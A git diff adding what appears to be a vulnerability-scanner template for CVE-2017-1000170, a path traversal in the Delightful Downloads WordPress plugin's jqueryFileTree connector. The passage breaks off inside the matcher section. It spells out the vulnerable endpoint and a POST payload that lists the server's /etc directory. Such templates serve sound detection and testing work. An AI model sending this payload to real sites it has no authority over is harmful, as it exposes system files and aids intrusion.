diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml new file mode 100644 index 0000000000..cb3e001dd0 --- /dev/null +++ b/cves/2017/CVE-2017-1000170.yaml @@ -0,0 +1,26 @@ +id: CVE-2017-1000170 + +info: + name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal + author: dwisiswant0 + severity: high + reference: https://www.exploit-db.com/exploits/49693 + description: jqueryFileTree 2.1.5 and older Directory Traversal + tags: cve,cve2017,wordpress,wp-plugin,lfi + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php" + body: "dir=%2Fetc%2F&onlyFiles=true" + matchers-condition: and + matchers: + - type: word + words: + - "